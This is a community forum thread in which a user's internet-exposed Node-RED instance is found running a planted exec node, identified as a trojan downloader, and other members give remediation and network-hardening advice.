Node-RED compromise hack

Hello,
I have this exec function appear on my flow. I delete it two times and keep appearing.
Can someone help with this problem ?

Thank you.

That looks extremely suspect!!
Why are you still leaving it to run?

The IP appears on 3 black lists

  • If your Node Red is publicly facing (in same way) - take action now to review your security
  • Review recently installed Nodes
  • Review who has access to your flows/system/network/servers

@TotallyInformation, @Steve-Mcl

Seen anything like this?

This is:

TrojanDownloader:Linux/Morila!MTB

As it has likely run on that system, the system is compromised and likely requires a complete rebuild.

Title changed as a hack is confirmed.


A strong reminder to all who come across this post:

DO NOT EXPOSE YOUR NODE-RED SERVER TO THE INTERNET UNLESS YOU KNOW WHAT YOU ARE DOING

It WILL be compromised.

1 Like

It certainly looks like you have exposed your node-red to the internet and it has been abused. I won't say hacked since it was quite probably wide open / no password / no SSL etc.

If you don't know how to secure node-red, there are lots of posts on the forum covering this topic, but it is not a simple task to do it properly.

If you want to use node-red from across the internet, but you are not sure how, then perhaps a preprepared fully secure cloud provider of Node-RED would be better? There are a several around. I'd recommend FlowFuse (for disclosure, it is the company I work for)

1 Like

@steveh92

Given we were detailing at what level of security you should employee for publicly facing Node RED instances - enjoy this somewhat raw post of such event that you could up dealing if not taken seriously!

3 Likes

Sorry, another reinforcement message. This trojan is a gateway for other malware. This means that there will now be any number of malware apps and processes on the server. Some of which may be well hidden.

It could also act as a gateway for things like ransomware and may act as an entry point for access to other poorly secured devices on the same network.

These things can spread literally like wildfire and take over an entire network of devices in seconds.

Many home networks are particularly vulnerable since convenience is often prioritised over security and where home routers may have minimal security.

1 Like

I never press that inject node.
I never merge the flow.
And I allways delete exec function and deploy node.

Does it matter what I did or is it compromised?

a new screenshot

It's compromised

Trust us, someone else has already deployed and injected.

2 Likes

Maybe you are lucky and you can close any ports that you opened on your router, delete that exec node and all will be well.

Or maybe multiple devices on your network are now running malware, your online banking and other accounts are compromised and your devices have taken an active role as a botnet in the Russia/Ukraine war.

The malware got onto your Node-red server. Why would you assume that the only thing it did was insert that exec node [and not deploy]?

As it is most likely that someone accessed the Node-RED Editor, it is they who will have injected and run the compromise. I'm afraid it is certainly compromised.

To put it lightly :grin:

@meccip

  • Re-image that machine
  • Scan all devices on your network
  • Don't open Node RED (or any port) to the public until you have thoroughly understood the risks (and addressed them fully)
  • Know that they are skilled at what they do

I have this situation for 3 days and nothing happened. On my raspberry I have my solar sistem. nodered is getting info from it and send to my phone. What can be done with this? Turn my inverter to Hybrid state. My bank account is not online. I am a cash guy. In my network I have a Windows 10 with nodered on it but just for testing. I have some devices that give me temperature and turn on/off some relays.
I just turn my raspberry port OFF and work on nodered password security.

  • Re-bake the now ruined pi (setting a password will NOT make it better)
    why is it still on??
  • If you need to keep your flows, export / import into a NON-NETWORKED machine and remove any out of the "norm" node setup (BEFORE DEPLOY)
  • Scan any devices on your network that are capable of running process's that can be harmful
  • Close your firewall/ports (seriously close them!)
  • Keep them closed, until you fully understand what your doing
1 Like

Let's assume that he accessed Node-RED Editor and put that exec function. To make it work, you have to deploy the flows ? In this case it is like I deploy the flows ? I am asking this because every time i deploy the flows I get some notifications on my phone when some functions start to initialize.

I have Arduino and esp01 as devices. I don't think that can be harm.

Stop kidding your self!

It's running - there's a Process ID associated to the Node (5532)!
You Don't have to deploy the whole flow to start something

All advice has been given

Screenshot 2023-10-22 at 17.36.25

1 Like

If this popped up on my nodered I would immediately unplug the entire house from my internet connection. Have to go completely offline until you assess every single network device in your possession. And every network device you've connected to within the last few weeks.

Like Marcus said, it's literally running the exec node in your first screenshot.

You need to unplug ALL network things in your house and do a whole lot of research and damage control. Assume that you've just leaked:
-all of your passwords to everything
-all data on all of your devices (phone, computer, iPad, everything)
-all of your addresses (email and physical)
-access to everything that was on your network in the last few weeks

And work backwards from there. This is the kind of thing that would cause me to enable that new Apple "lock down" mode.

2 Likes

Yes. Assuming they didn't also get some other access as well.

Yes.

Assuming they didn't temporarily disconnect those.


Seriously though, it is going to be quicker, safer and easier - and give you far more peace of mind - to create a new SD card and swap things over carefully.

Well, not impossible but unlikely. However, if those control anything important, it might be possible for someone to cause damage - like turning on your boiler to max. Not probably a high risk but not zero either.

There is also the - admittedly probably fairly unlikely - possibility that you have exposed your comings and goings (when you are at home) to someone who might make use of it.

Well, someone may now have the ability to also contact your phone. That is worth money right there. And in some countries where phone SIM takeovers are rife, it can be quite a problem since you may have other services that can be taken over if someone has access to hijack your phone (SMS, etc).

There is no absolute way for us to know the risks. It depends on a lot of factors and in most cases it will be fairly low but there are certainly some areas of the world where the risk could be very high indeed.

So you should make sure that your phone is up-to-date with patches and is properly secured. If your airtime provider allows it, you might also want to lock your SIM to prevent take-over. If you have any 2-factor authentication that relies on SMS, get it changed ASAP to use an authenticator app (preferably one you can use on the PC as well such as Bitwarden premium or family accounts or Authy).

And double check your email accounts - maybe change passwords just to be doubly safe.

But only do this once you are certain that potentially compromised devices are offline.


Listen, don't panic about all this, the overall probability of a cascade of issues is quite low in most cases and in most countries. But the impact can be very high so worth taking precautions.

Most of this is stuff you should be doing anyway as a digital citizen.

4 Likes

@marcus-j-davies

Glad I got this email notification, turned off the instance straight away last night. Don't want to leave it on while not in use. Think today will involve some systems hardening.

2 Likes